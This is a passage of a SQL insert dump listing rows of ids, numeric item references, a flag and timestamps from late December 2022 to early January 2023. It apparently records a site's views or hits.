14:58:55'),(66843,487,1,'2022-12-26','2022-12-26 15:10:46'),(66844,3178,1,'2022-12-26','2022-12-26 15:31:20'),(66845,4960,1,'2022-12-26','2022-12-26 15:53:21'),(66846,1586,1,'2022-12-26','2022-12-26 15:57:02'),(66847,1606,1,'2022-12-26','2022-12-26 16:09:06'),(66848,2911,1,'2022-12-26','2022-12-26 16:22:02'),(66849,1772,1,'2022-12-26','2022-12-26 17:00:36'),(66850,4759,1,'2022-12-26','2022-12-26 17:52:00'),(66851,1699,1,'2022-12-26','2022-12-26 17:53:03'),(66852,1732,1,'2022-12-26','2022-12-26 18:36:20'),(66853,1592,1,'2022-12-26','2022-12-26 18:40:51'),(66854,84,1,'2022-12-26','2022-12-26 18:45:11'),(66855,4980,1,'2022-12-26','2022-12-26 18:46:00'),(66856,468,1,'2022-12-26','2022-12-26 19:08:08'),(66857,473,1,'2022-12-26','2022-12-26 19:30:15'),(66858,3691,1,'2022-12-26','2022-12-26 19:49:11'),(66859,4759,1,'2022-12-26','2022-12-26 20:10:49'),(66860,1596,1,'2022-12-26','2022-12-26 20:15:04'),(66861,4762,1,'2022-12-26','2022-12-26 20:22:20'),(66862,570,1,'2022-12-26','2022-12-26 22:36:44'),(66863,5140,1,'2022-12-26','2022-12-26 23:04:12'),(66864,570,1,'2022-12-27','2022-12-27 02:48:00'),(66865,80,1,'2022-12-27','2022-12-27 04:19:51'),(66866,2904,1,'2022-12-27','2022-12-27 04:20:48'),(66867,2904,1,'2022-12-27','2022-12-27 04:21:37'),(66868,2904,1,'2022-12-27','2022-12-27 04:22:06'),(66869,2309,1,'2022-12-27','2022-12-27 05:16:26'),(66870,3297,1,'2022-12-27','2022-12-27 06:00:42'),(66871,1614,1,'2022-12-27','2022-12-27 06:30:16'),(66872,72,1,'2022-12-27','2022-12-27 06:52:51'),(66873,4911,1,'2022-12-27','2022-12-27 06:59:47'),(66874,89,1,'2022-12-27','2022-12-27 07:11:05'),(66875,110,1,'2022-12-27','2022-12-27 07:14:13'),(66876,1596,1,'2022-12-27','2022-12-27 07:28:54'),(66877,1604,1,'2022-12-27','2022-12-27 07:45:45'),(66878,1770,1,'2022-12-27','2022-12-27 07:58:17'),(66879,3691,1,'2022-12-27','2022-12-27 08:12:40'),(66880,80,1,'2022-12-27','2022-12-27 08:34:08'),(66881,2809,1,'2022-12-27','2022-12-27 08:41:33'),(66882,80,1,'2022-12-27','2022-12-27 08:43:27'),(66883,4457,1,'2022-12-27','2022-12-27 09:06:47'),(66884,91,1,'2022-12-27','2022-12-27 10:46:19'),(66885,3781,1,'2022-12-27','2022-12-27 12:10:31'),(66886,3541,1,'2022-12-27','2022-12-27 12:32:50'),(66887,3787,1,'2022-12-27','2022-12-27 12:45:10'),(66888,2309,1,'2022-12-27','2022-12-27 13:38:54'),(66889,1610,1,'2022-12-27','2022-12-27 14:02:20'),(66890,76,1,'2022-12-27','2022-12-27 14:02:30'),(66891,1610,1,'2022-12-27','2022-12-27 14:02:51'),(66892,1610,1,'2022-12-27','2022-12-27 14:03:34'),(66893,2395,1,'2022-12-27','2022-12-27 14:35:08'),(66894,108,1,'2022-12-27','2022-12-27 14:53:50'),(66895,4520,1,'2022-12-27','2022-12-27 15:00:42'),(66896,1778,1,'2022-12-27','2022-12-27 15:18:10'),(66897,3290,1,'2022-12-27','2022-12-27 16:07:44'),(66898,4485,1,'2022-12-27','2022-12-27 16:22:22'),(66899,2457,1,'2022-12-27','2022-12-27 16:37:16'),(66900,1596,1,'2022-12-27','2022-12-27 16:43:45'),(66901,1598,1,'2022-12-27','2022-12-27 16:51:29'),(66902,1598,1,'2022-12-27','2022-12-27 16:51:32'),(66903,4627,1,'2022-12-27','2022-12-27 17:06:24'),(66904,3724,1,'2022-12-27','2022-12-27 17:38:53'),(66905,4911,1,'2022-12-27','2022-12-27 18:25:23'),(66906,4911,1,'2022-12-27','2022-12-27 18:26:37'),(66907,1610,1,'2022-12-27','2022-12-27 18:36:15'),(66908,2769,1,'2022-12-27','2022-12-27 18:58:45'),(66909,467,1,'2022-12-27','2022-12-27 19:45:52'),(66910,5163,1,'2022-12-27','2022-12-27 19:47:47'),(66911,4938,1,'2022-12-27','2022-12-27 20:15:31'),(66912,3541,1,'2022-12-27','2022-12-27 20:51:04'),(66913,4691,1,'2022-12-27','2022-12-27 20:55:22'),(66914,2658,1,'2022-12-27','2022-12-27 22:10:05'),(66915,4706,1,'2022-12-27','2022-12-27 22:10:50'),(66916,1610,1,'2022-12-27','2022-12-27 23:42:32'),(66917,1544,1,'2022-12-28','2022-12-28 00:09:56'),(66918,4338,1,'2022-12-28','2022-12-28 00:27:04'),(66919,89,1,'2022-12-28','2022-12-28 00:57:38'),(66920,1778,1,'2022-12-28','2022-12-28 01:27:05'),(66921,3777,1,'2022-12-28','2022-12-28 02:05:21'),(66922,108,1,'2022-12-28','2022-12-28 03:03:21'),(66923,2964,1,'2022-12-28','2022-12-28 03:17:39'),(66924,1596,1,'2022-12-28','2022-12-28 03:42:40'),(66925,3777,1,'2022-12-28','2022-12-28 05:15:20'),(66926,3534,1,'2022-12-28','2022-12-28 05:53:36'),(66927,4756,1,'2022-12-28','2022-12-28 05:54:24'),(66928,3534,1,'2022-12-28','2022-12-28 05:54:41'),(66929,4776,1,'2022-12-28','2022-12-28 06:30:58'),(66930,2293,1,'2022-12-28','2022-12-28 07:14:08'),(66931,1610,1,'2022-12-28','2022-12-28 08:01:48'),(66932,1610,1,'2022-12-28','2022-12-28 08:02:19'),(66933,76,1,'2022-12-28','2022-12-28 08:33:35'),(66934,3781,1,'2022-12-28','2022-12-28 08:35:59'),(66935,4747,1,'2022-12-28','2022-12-28 09:18:31'),(66936,4911,1,'2022-12-28','2022-12-28 09:32:36'),(66937,3735,1,'2022-12-28','2022-12-28 11:22:57'),(66938,4911,1,'2022-12-28','2022-12-28 11:30:25'),(66939,4960,1,'2022-12-28','2022-12-28 12:06:16'),(66940,4963,1,'2022-12-28','2022-12-28 12:06:20'),(66941,4944,1,'2022-12-28','2022-12-28 12:31:55'),(66942,1596,1,'2022-12-28','2022-12-28 13:02:33'),(66943,1586,1,'2022-12-28','2022-12-28 13:18:52'),(66944,1586,1,'2022-12-28','2022-12-28 13:19:16'),(66945,1612,1,'2022-12-28','2022-12-28 13:23:23'),(66946,80,1,'2022-12-28','2022-12-28 13:28:08'),(66947,76,1,'2022-12-28','2022-12-28 13:32:35'),(66948,4408,1,'2022-12-28','2022-12-28 14:32:34'),(66949,3107,1,'2022-12-28','2022-12-28 14:32:37'),(66950,1596,1,'2022-12-28','2022-12-28 15:19:38'),(66951,3664,1,'2022-12-28','2022-12-28 15:19:48'),(66952,3752,1,'2022-12-28','2022-12-28 15:42:09'),(66953,4911,1,'2022-12-28','2022-12-28 16:01:13'),(66954,3777,1,'2022-12-28','2022-12-28 16:21:13'),(66955,4457,1,'2022-12-28','2022-12-28 16:46:28'),(66956,1602,1,'2022-12-28','2022-12-28 18:08:47'),(66957,4323,1,'2022-12-28','2022-12-28 18:31:22'),(66958,4323,1,'2022-12-28','2022-12-28 18:31:56'),(66959,4703,1,'2022-12-28','2022-12-28 18:32:07'),(66960,5058,1,'2022-12-28','2022-12-28 19:16:35'),(66961,4341,1,'2022-12-28','2022-12-28 19:42:47'),(66962,2769,1,'2022-12-28','2022-12-28 20:31:36'),(66963,1602,1,'2022-12-28','2022-12-28 21:34:57'),(66964,4542,1,'2022-12-28','2022-12-28 21:47:52'),(66965,3764,1,'2022-12-28','2022-12-28 22:10:01'),(66966,2964,1,'2022-12-28','2022-12-28 22:28:43'),(66967,1701,1,'2022-12-28','2022-12-28 23:42:03'),(66968,2658,1,'2022-12-28','2022-12-28 23:51:55'),(66969,486,1,'2022-12-29','2022-12-29 00:47:03'),(66970,4338,1,'2022-12-29','2022-12-29 01:29:47'),(66971,1586,1,'2022-12-29','2022-12-29 02:21:12'),(66972,470,1,'2022-12-29','2022-12-29 02:49:49'),(66973,2309,1,'2022-12-29','2022-12-29 03:03:12'),(66974,469,1,'2022-12-29','2022-12-29 03:23:19'),(66975,4657,1,'2022-12-29','2022-12-29 03:53:13'),(66976,3307,1,'2022-12-29','2022-12-29 04:03:53'),(66977,3307,1,'2022-12-29','2022-12-29 04:14:35'),(66978,80,1,'2022-12-29','2022-12-29 04:20:08'),(66979,3297,1,'2022-12-29','2022-12-29 04:46:41'),(66980,1602,1,'2022-12-29','2022-12-29 05:43:26'),(66981,3259,1,'2022-12-29','2022-12-29 06:13:10'),(66982,1602,1,'2022-12-29','2022-12-29 06:43:07'),(66983,1602,1,'2022-12-29','2022-12-29 07:28:08'),(66984,1588,1,'2022-12-29','2022-12-29 07:34:39'),(66985,1588,1,'2022-12-29','2022-12-29 07:34:50'),(66986,3735,1,'2022-12-29','2022-12-29 07:40:32'),(66987,1776,1,'2022-12-29','2022-12-29 07:47:09'),(66988,1588,1,'2022-12-29','2022-12-29 07:51:24'),(66989,1608,1,'2022-12-29','2022-12-29 08:15:30'),(66990,4960,1,'2022-12-29','2022-12-29 08:35:59'),(66991,4301,1,'2022-12-29','2022-12-29 08:39:55'),(66992,2769,1,'2022-12-29','2022-12-29 08:55:11'),(66993,2769,1,'2022-12-29','2022-12-29 08:56:18'),(66994,1778,1,'2022-12-29','2022-12-29 08:59:54'),(66995,80,1,'2022-12-29','2022-12-29 09:04:08'),(66996,80,1,'2022-12-29','2022-12-29 09:19:30'),(66997,1600,1,'2022-12-29','2022-12-29 09:25:07'),(66998,1600,1,'2022-12-29','2022-12-29 10:01:23'),(66999,4960,1,'2022-12-29','2022-12-29 10:26:46'),(67000,4930,1,'2022-12-29','2022-12-29 11:48:57'),(67001,469,1,'2022-12-29','2022-12-29 11:51:33'),(67002,4960,1,'2022-12-29','2022-12-29 12:36:49'),(67003,1586,1,'2022-12-29','2022-12-29 12:39:59'),(67004,80,1,'2022-12-29','2022-12-29 12:40:31'),(67005,1598,1,'2022-12-29','2022-12-29 13:11:13'),(67006,80,1,'2022-12-29','2022-12-29 13:11:23'),(67007,1612,1,'2022-12-29','2022-12-29 13:13:49'),(67008,2252,1,'2022-12-29','2022-12-29 13:20:55'),(67009,4485,1,'2022-12-29','2022-12-29 13:22:45'),(67010,4750,1,'2022-12-29','2022-12-29 13:38:10'),(67011,4747,1,'2022-12-29','2022-12-29 14:04:08'),(67012,4338,1,'2022-12-29','2022-12-29 14:15:39'),(67013,4930,1,'2022-12-29','2022-12-29 14:44:04'),(67014,1870,1,'2022-12-29','2022-12-29 14:49:11'),(67015,89,1,'2022-12-29','2022-12-29 14:51:54'),(67016,470,1,'2022-12-29','2022-12-29 15:29:21'),(67017,470,1,'2022-12-29','2022-12-29 15:30:23'),(67018,1612,1,'2022-12-29','2022-12-29 15:49:01'),(67019,3069,1,'2022-12-29','2022-12-29 15:49:24'),(67020,3069,1,'2022-12-29','2022-12-29 15:53:31'),(67021,5140,1,'2022-12-29','2022-12-29 16:22:26'),(67022,5140,1,'2022-12-29','2022-12-29 16:22:43'),(67023,1588,1,'2022-12-29','2022-12-29 16:24:40'),(67024,3004,1,'2022-12-29','2022-12-29 16:51:45'),(67025,3004,1,'2022-12-29','2022-12-29 16:53:46'),(67026,1778,1,'2022-12-29','2022-12-29 17:41:06'),(67027,1602,1,'2022-12-29','2022-12-29 18:41:58'),(67028,4457,1,'2022-12-29','2022-12-29 19:15:22'),(67029,80,1,'2022-12-29','2022-12-29 19:50:14'),(67030,469,1,'2022-12-29','2022-12-29 20:21:26'),(67031,1722,1,'2022-12-29','2022-12-29 21:30:28'),(67032,1709,1,'2022-12-29','2022-12-29 22:03:12'),(67033,1739,1,'2022-12-29','2022-12-29 22:33:03'),(67034,4338,1,'2022-12-30','2022-12-30 01:13:49'),(67035,1596,1,'2022-12-30','2022-12-30 01:46:41'),(67036,4911,1,'2022-12-30','2022-12-30 02:14:10'),(67037,1606,1,'2022-12-30','2022-12-30 02:42:26'),(67038,1606,1,'2022-12-30','2022-12-30 02:43:42'),(67039,3764,1,'2022-12-30','2022-12-30 02:43:44'),(67040,4980,1,'2022-12-30','2022-12-30 03:09:44'),(67041,2420,1,'2022-12-30','2022-12-30 03:37:01'),(67042,469,1,'2022-12-30','2022-12-30 04:29:16'),(67043,1544,1,'2022-12-30','2022-12-30 07:22:37'),(67044,3691,1,'2022-12-30','2022-12-30 07:28:43'),(67045,4874,1,'2022-12-30','2022-12-30 07:43:47'),(67046,1588,1,'2022-12-30','2022-12-30 08:40:17'),(67047,5163,1,'2022-12-30','2022-12-30 09:16:57'),(67048,80,1,'2022-12-30','2022-12-30 09:18:03'),(67049,3691,1,'2022-12-30','2022-12-30 09:32:27'),(67050,4485,1,'2022-12-30','2022-12-30 10:28:36'),(67051,4944,1,'2022-12-30','2022-12-30 11:22:25'),(67052,469,1,'2022-12-30','2022-12-30 12:19:58'),(67053,3764,1,'2022-12-30','2022-12-30 13:16:51'),(67054,1741,1,'2022-12-30','2022-12-30 13:54:50'),(67055,3072,1,'2022-12-30','2022-12-30 14:48:46'),(67056,68,1,'2022-12-30','2022-12-30 15:11:43'),(67057,4741,1,'2022-12-30','2022-12-30 15:11:55'),(67058,1602,1,'2022-12-30','2022-12-30 16:19:08'),(67059,1544,1,'2022-12-30','2022-12-30 16:55:37'),(67060,1544,1,'2022-12-30','2022-12-30 17:01:54'),(67061,1766,1,'2022-12-30','2022-12-30 17:04:33'),(67062,3764,1,'2022-12-30','2022-12-30 17:15:17'),(67063,1596,1,'2022-12-30','2022-12-30 17:25:36'),(67064,469,1,'2022-12-30','2022-12-30 17:35:42'),(67065,469,1,'2022-12-30','2022-12-30 17:43:28'),(67066,1608,1,'2022-12-30','2022-12-30 18:25:00'),(67067,3731,1,'2022-12-30','2022-12-30 19:22:28'),(67068,5054,1,'2022-12-30','2022-12-30 19:29:15'),(67069,4911,1,'2022-12-30','2022-12-30 19:49:33'),(67070,1608,1,'2022-12-30','2022-12-30 19:53:18'),(67071,4776,1,'2022-12-30','2022-12-30 20:30:43'),(67072,5140,1,'2022-12-30','2022-12-30 20:47:20'),(67073,2457,1,'2022-12-30','2022-12-30 21:20:45'),(67074,3083,1,'2022-12-30','2022-12-30 22:12:12'),(67075,80,1,'2022-12-30','2022-12-30 22:24:38'),(67076,1749,1,'2022-12-30','2022-12-30 22:42:42'),(67077,1614,1,'2022-12-30','2022-12-30 23:13:03'),(67078,2410,1,'2022-12-30','2022-12-30 23:42:30'),(67079,3724,1,'2022-12-31','2022-12-31 00:12:44'),(67080,3004,1,'2022-12-31','2022-12-31 00:28:54'),(67081,4944,1,'2022-12-31','2022-12-31 02:40:07'),(67082,4542,1,'2022-12-31','2022-12-31 02:57:27'),(67083,3127,1,'2022-12-31','2022-12-31 03:42:27'),(67084,1596,1,'2022-12-31','2022-12-31 03:50:30'),(67085,1608,1,'2022-12-31','2022-12-31 03:50:32'),(67086,2159,1,'2022-12-31','2022-12-31 04:34:39'),(67087,4416,1,'2022-12-31','2022-12-31 04:35:29'),(67088,3096,1,'2022-12-31','2022-12-31 04:36:13'),(67089,4428,1,'2022-12-31','2022-12-31 05:20:28'),(67090,4700,1,'2022-12-31','2022-12-31 05:20:38'),(67091,3698,1,'2022-12-31','2022-12-31 06:05:32'),(67092,80,1,'2022-12-31','2022-12-31 06:51:14'),(67093,1612,1,'2022-12-31','2022-12-31 08:23:33'),(67094,87,1,'2022-12-31','2022-12-31 08:24:18'),(67095,488,1,'2022-12-31','2022-12-31 08:25:04'),(67096,487,1,'2022-12-31','2022-12-31 08:25:41'),(67097,486,1,'2022-12-31','2022-12-31 08:26:13'),(67098,485,1,'2022-12-31','2022-12-31 08:26:26'),(67099,484,1,'2022-12-31','2022-12-31 08:26:45'),(67100,483,1,'2022-12-31','2022-12-31 08:26:58'),(67101,482,1,'2022-12-31','2022-12-31 08:27:08'),(67102,481,1,'2022-12-31','2022-12-31 08:27:21'),(67103,480,1,'2022-12-31','2022-12-31 08:27:48'),(67104,481,1,'2022-12-31','2022-12-31 08:28:16'),(67105,482,1,'2022-12-31','2022-12-31 08:28:20'),(67106,1600,1,'2022-12-31','2022-12-31 08:31:52'),(67107,3102,1,'2022-12-31','2022-12-31 09:07:01'),(67108,2904,1,'2022-12-31','2022-12-31 09:22:39'),(67109,4960,1,'2022-12-31','2022-12-31 09:59:44'),(67110,3735,1,'2022-12-31','2022-12-31 10:30:36'),(67111,4566,1,'2022-12-31','2022-12-31 11:18:41'),(67112,1596,1,'2022-12-31','2022-12-31 12:41:34'),(67113,4963,1,'2022-12-31','2022-12-31 14:11:30'),(67114,2165,1,'2022-12-31','2022-12-31 14:57:49'),(67115,87,1,'2022-12-31','2022-12-31 14:59:47'),(67116,480,1,'2022-12-31','2022-12-31 15:00:11'),(67117,479,1,'2022-12-31','2022-12-31 15:00:26'),(67118,480,1,'2022-12-31','2022-12-31 15:00:40'),(67119,479,1,'2022-12-31','2022-12-31 15:00:48'),(67120,4960,1,'2022-12-31','2022-12-31 15:44:06'),(67121,4428,1,'2022-12-31','2022-12-31 15:50:33'),(67122,1600,1,'2022-12-31','2022-12-31 15:52:27'),(67123,4938,1,'2022-12-31','2022-12-31 16:02:40'),(67124,1600,1,'2022-12-31','2022-12-31 16:12:40'),(67125,1600,1,'2022-12-31','2022-12-31 16:14:25'),(67126,4911,1,'2022-12-31','2022-12-31 17:18:39'),(67127,4911,1,'2022-12-31','2022-12-31 17:18:43'),(67128,4485,1,'2022-12-31','2022-12-31 17:20:31'),(67129,87,1,'2022-12-31','2022-12-31 18:40:53'),(67130,2248,1,'2022-12-31','2022-12-31 19:20:15'),(67131,4878,1,'2022-12-31','2022-12-31 21:31:39'),(67132,2410,1,'2022-12-31','2022-12-31 22:22:44'),(67133,2457,1,'2022-12-31','2022-12-31 22:44:47'),(67134,4888,1,'2022-12-31','2022-12-31 23:38:09'),(67135,1614,1,'2022-12-31','2022-12-31 23:52:18'),(67136,335,1,'2022-12-31','2022-12-31 23:52:25'),(67137,4428,1,'2023-01-01','2023-01-01 01:28:24'),(67138,1608,1,'2023-01-01','2023-01-01 02:13:19'),(67139,68,1,'2023-01-01','2023-01-01 02:42:15'),(67140,4608,1,'2023-01-01','2023-01-01 02:47:31'),(67141,3787,1,'2023-01-01','2023-01-01 03:03:44'),(67142,2457,1,'2023-01-01','2023-01-01 03:52:54'),(67143,3724,1,'2023-01-01','2023-01-01 04:09:26'),(67144,4878,1,'2023-01-01','2023-01-01 04:27:17'),(67145,80,1,'2023-01-01','2023-01-01 04:42:57'),(67146,80,1,'2023-01-01','2023-01-01 04:44:16'),(67147,2609,1,'2023-01-01','2023-01-01 04:49:03'),(67148,2775,1,'2023-01-01','2023-01-01 05:28:28'),(67149,3691,1,'2023-01-01','2023-01-01 06:18:50'),(67150,1594,1,'2023-01-01','2023-01-01 06:29:13'),(67151,4457,1,'2023-01-01','2023-01-01 06:29:59'),(67152,4520,1,'2023-01-01','2023-01-01 06:30:39'),(67153,473,1,'2023-01-01','2023-01-01 06:57:46'),(67154,1594,1,'2023-01-01','2023-01-01 08:08:54'),(67155,1596,1,'2023-01-01','2023-01-01 08:11:31'),(67156,1598,1,'2023-01-01','2023-01-01 08:12:25'),(67157,1596,1,'2023-01-01','2023-01-01 08:12:30'),(67158,1594,1,'2023-01-01','2023-01-01 08:12:50'),(67159,3489,1,'2023-01-01','2023-01-01 08:20:56'),(67160,4944,1,'2023-01-01','2023-01-01 08:54:38'),(67161,2989,1,'2023-01-01','2023-01-01 09:05:48'),(67162,2457,1,'2023-01-01','2023-01-01 09:15:51'),(67163,89,1,'2023-01-01','2023-01-01 10:11:10'),(67164,473,1,'2023-01-01','2023-01-01 11:14:21'),(67165,1608,1,'2023-01-01','2023-01-01 12:34:02'),(67166,3698,1,'2023-01-01','2023-01-01 13:19:02'),(67167,1598,1,'2023-01-01','2023-01-01 14:20:47'),(67168,3691,1,'2023-01-01','2023-01-01 15:11:08'),(67169,4960,1,'2023-01-01','2023-01-01 15:11:50'),(67170,4520,1,'2023-01-01','2023-01-01 15:35:00'),(67171,1586,1,'2023-01-01','2023-01-01 15:47:25'),(67172,3691,1,'2023-01-01','2023-01-01 16:39:34'),(67173,4944,1,'2023-01-01','2023-01-01 18:05:57'),(67174,4608,1,'2023-01-01','2023-01-01 18:50:50'),(67175,68,1,'2023-01-01','2023-01-01 18:50:51'),(67176,3072,1,'2023-01-01','2023-01-01 19:35:49'),(67177,1602,1,'2023-01-01','2023-01-01 19:44:38'),(67178,80,1,'2023-01-01','2023-01-01 19:44:48'),(67179,1614,1,'2023-01-01','2023-01-01 21:05:50'),(67180,1608,1,'2023-01-01','2023-01-01 21:34:03'),(67181,4529,1,'2023-01-01','2023-01-01 22:21:39'),(67182,3764,1,'2023-01-01','2023-01-01 22:21:40'),(67183,4524,1,'2023-01-01','2023-01-01 22:21:49'),(67184,4776,1,'2023-01-01','2023-01-01 22:21:54'),(67185,5042,1,'2023-01-01','2023-01-01 23:02:26'),(67186,3764,1,'2023-01-01','2023-01-01 23:19:01'),(67187,1586,1,'2023-01-02','2023-01-02 00:18:51'),(67188,3257,1,'2023-01-02','2023-01-02 01:04:53'),(67189,3691,1,'2023-01-02','2023-01-02 01:34:59'),(67190,4275,1,'2023-01-02','2023-01-02 02:04:48'),(67191,1598,1,'2023-01-02','2023-01-02 02:38:41'),(67192,3691,1,'2023-01-02','2023-01-02 03:38:03'),(67193,3030,1,'2023-01-02','2023-01-02 03:46:22'),(67194,68,1,'2023-01-02','2023-01-02 03:52:25'),(67195,4944,1,'2023-01-02','2023-01-02 03:52:26'),(67196,4608,1,'2023-01-02','2023-01-02 04:37:24'),(67197,3072,1,'2023-01-02','2023-01-02 04:38:22'),(67198,1608,1,'2023-01-02','2023-01-02 08:08:07'),(67199,4840,1,'2023-01-02','2023-01-02 08:08:27'),(67200,4960,1,'2023-01-02','2023-01-02 08:23:24'),(67201,1612,1,'2023-01-02','2023-01-02 08:25:43'),(67202,3096,1,'2023-01-02','2023-01-02 08:27:33'),(67203,1612,1,'2023-01-02','2023-01-02 08:29:02'),(67204,4960,1,'2023-01-02','2023-01-02 08:45:32'),(67205,3698,1,'2023-01-02','2023-01-02 08:54:46'),(67206,4432,1,'2023-01-02','2023-01-02 09:24:02'),(67207,4457,1,'2023-01-02','2023-01-02 09:24:29'),(67208,2309,1,'2023-01-02','2023-01-02 10:03:46'),(67209,2309,1,'2023-01-02','2023-01-02 10:40:52'),(67210,4368,1,'2023-01-02','2023-01-02 11:42:30'),(67211,1745,1,'2023-01-02','2023-01-02 13:10:39'),(67212,3781,1,'2023-01-02','2023-01-02 13:27:03'),(67213,68,1,'2023-01-02','2023-01-02 13:55:09'),(67214,2148,1,'2023-01-02','2023-01-02 13:56:13'),(67215,3313,1,'2023-01-02','2023-01-02 14:17:35'),(67216,1745,1,'2023-01-02','2023-01-02 14:28:29'),(67217,3498,1,'2023-01-02','2023-01-02 14:40:02'),(67218,3006,1,'2023-01-02','2023-01-02 14:41:16'),(67219,1602,1,'2023-01-02','2023-01-02 15:01:24'),(67220,80,1,'2023-01-02','2023-01-02 15:01:31'),(67221,80,1,'2023-01-02','2023-01-02 15:02:25'),(67222,3004,1,'2023-01-02','2023-01-02 16:32:18'),(67223,1608,1,'2023-01-02','2023-01-02 16:41:34'),(67224,80,1,'2023-01-02','2023-01-02 17:19:33'),(67225,2297,1,'2023-01-02','2023-01-02 18:10:38'),(67226,4703,1,'2023-01-02','2023-01-02 18:26:56'),(67227,5071,1,'2023-01-02','2023-01-02 19:26:09'),(67228,4485,1,'2023-01-02','2023-01-02 19:41:19'),(67229,2457,1,'2023-01-02','2023-01-02 20:13:08'),(67230,2769,1,'2023-01-02','2023-01-02 20:33:45'),(67231,2769,1,'2023-01-02','2023-01-02 20:36:51'),(67232,5080,1,'2023-01-02','2023-01-02 20:55:30'),(67233,1724,1,'2023-01-02','2023-01-02 21:36:13'),(67234,5080,1,'2023-01-02','2023-01-02 21:40:21'),(67235,5080,1,'2023-01-02','2023-01-02 22:54:06'),(67236,4420,1,'2023-01-02','2023-01-02 23:09:46'),(67237,1586,1,'2023-01-02','2023-01-02 23:37:42'),(67238,5140,1,'2023-01-02','2023-01-02 23:49:07'),(67239,3727,1,'2023-01-02','2023-01-02 23:54:32'),(67240,68,1,'2023-01-03','2023-01-03 02:42:14'),(67241,1608,1,'2023-01-03','2023-01-03 02:42:26'),(67242,4703,1,'2023-01-03','2023-01-03 02:54:32'),(67243,3072,1,'2023-01-03','2023-01-03 03:27:12'),(67244,3698,1,'2023-01-03','2023-01-03 03:29:45'),(67245,4416,1,'2023-01-03','2023-01-03 03:53:08'),(67246,4966,1,'2023-01-03','2023-01-03 04:01:29'),(67247,3691,1,'2023-01-03','2023-01-03 04:15:06'),(67248,1602,1,'2023-01-03','2023-01-03 05:07:51'),(67249,1722,1,'2023-01-03','2023-01-03 05:17:18'),(67250,1602,1,'2023-01-03','2023-01-03 06:53:11'),(67251,1602,1,'2023-01-03','2023-01-03 06:53:11'),(67252,1602,1,'2023-01-03','2023-01-03 06:53:13'),(67253,1582,1,'2023-01-03','2023-01-03 06:55:15'),(67254,3004,1,'2023-01-03','2023-01-03 07:04:19'),(67255,3004,1,'2023-01-03','2023-01-03 07:05:20'),(67256,3004,1,'2023-01-03','2023-01-03 07:06:03'),(67257,4858,1,'2023-01-03','2023-01-03 07:54:34'),(67258,4883,1,'2023-01-03','2023-01-03 08:24:36'),(67259,1598,1,'2023-01-03','2023-01-03 10:24:31'),(67260,5163,1,'2023-01-03','2023-01-03 10:37:08'),(67261,76,1,'2023-01-03','2023-01-03 10:45:27'),(67262,89,1,'2023-01-03','2023-01-03 10:46:08'),(67263,89,1,'2023-01-03','2023-01-03 10:46:51'),(67264,4639,1,'2023-01-03','2023-01-03 10:53:39'),(67265,1612,1,'2023-01-03','2023-01-03 11:12:15'),(67266,3781,1,'2023-01-03','2023-01-03 11:24:46'),(67267,1715,1,'2023-01-03','2023-01-03 11:37:46'),(67268,4966,1,'2023-01-03','2023-01-03 12:54:37'),(67269,1602,1,'2023-01-03','2023-01-03 13:10:49'),(67270,4802,1,'2023-01-03','2023-01-03 13:21:48'),(67271,1726,1,'2023-01-03','2023-01-03 13:26:47'),(67272,470,1,'2023-01-03','2023-01-03 13:39:19'),(67273,91,1,'2023-01-03','2023-01-03 13:50:27'),(67274,68,1,'2023-01-03','2023-01-03 13:52:26'),(67275,1544,1,'2023-01-03','2023-01-03 14:11:41'),(67276,2769,1,'2023-01-03','2023-01-03 14:25:32'),(67277,68,1,'2023-01-03','2023-01-03 14:35:20'),(67278,3789,1,'2023-01-03','2023-01-03 15:12:22'),(67279,3004,1,'2023-01-03','2023-01-03 15:20:16'),(67280,1600,1,'2023-01-03','2023-01-03 15:24:28'),(67281,1596,1,'2023-01-03','2023-01-03 16:48:09'),(67282,80,1,'2023-01-03','2023-01-03 17:07:22'),(67283,479,1,'2023-01-03','2023-01-03 17:32:44'),(67284,4416,1,'2023-01-03','2023-01-03 18:16:58'),(67285,1544,1,'2023-01-03','2023-01-03 18:28:50'),(67286,4612,1,'2023-01-03','2023-01-03 18:36:59'),(67287,1598,1,'2023-01-03','2023-01-03 18:51:17'),(67288,91,1,'2023-01-03','2023-01-03 19:11:17'),(67289,76,1,'2023-01-03','2023-01-03 19:39:56'),(67290,1724,1,'2023-01-03','2023-01-03 19:58:43'),(67291,3781,1,'2023-01-03','2023-01-03 20:06:15'),(67292,3781,1,'2023-01-03','2023-01-03 20:36:29'),(67293,4963,1,'2023-01-03','2023-01-03 20:57:04'),(67294,4963,1,'2023-01-03','2023-01-03 21:43:58'),(67295,4963,1,'2023-01-03','2023-01-03 21:46:15'),(67296,91,1,'2023-01-03','2023-01-03 22:06:29'),(67297,4944,1,'2023-01-03','2023-01-03 22:12:26'),(67298,4938,1,'2023-01-03','2023-01-03 22:25:29'),(67299,80,1,'2023-01-03','2023-01-03 23:04:34'),(67300,4930,1,'2023-01-03','2023-01-03 23:05:09'),(67301,4391,1,'2023-01-03','2023-01-03 23:09:13'),(67302,87,1,'2023-01-03','2023-01-03 23:09:37'),(67303,87,1,'2023-01-03','2023-01-03 23:22:18'),(67304,3781,1,'2023-01-03','2023-01-03 23:24:08'),(67305,2617,1,'2023-01-04','2023-01-04 00:36:16'),(67306,4722,1,'2023-01-04','2023-01-04 00:42:56'),(67307,4960,1,'2023-01-04','2023-01-04 00:51:57'),(67308,4966,1,'2023-01-04','2023-01-04 01:12:14'),(67309,1602,1,'2023-01-04','2023-01-04 01:29:54'),(67310,4587,1,'2023-01-04','2023-01-04 01:58:08'),(67311,1598,1,'2023-01-04','2023-01-04 02:53:29'),(67312,4323,1,'2023-01-04','2023-01-04 03:18:44'),(67313,1612,1,'2023-01-04','2023-01-04 03:19:06'),(67314,3764,1,'2023-01-04','2023-01-04 04:06:58'),(67315,3764,1,'2023-01-04','2023-01-04 04:11:06'),(67316,3781,1,'2023-01-04','2023-01-04 04:13:21'),(67317,3764,1,'2023-01-04','2023-01-04 04:14:22'),(67318,1544,1,'2023-01-04','2023-01-04 04:49:42'),(67319,87,1,'2023-01-04','2023-01-04 04:49:44'),(67320,3691,1,'2023-01-04','2023-01-04 05:00:23'),(67321,3117,1,'2023-01-04','2023-01-04 05:01:33'),(67322,1582,1,'2023-01-04','2023-01-04 05:31:58'),(67323,2769,1,'2023-01-04','2023-01-04 06:18:32'),(67324,487,1,'2023-01-04','2023-01-04 07:04:41'),(67325,87,1,'2023-01-04','2023-01-04 07:17:33'),(67326,91,1,'2023-01-04','2023-01-04 07:31:40'),(67327,87,1,'2023-01-04','2023-01-04 07:42:02'),(67328,467,1,'2023-01-04','2023-01-04 07:49:42'),(67329,72,1,'2023-01-04','2023-01-04 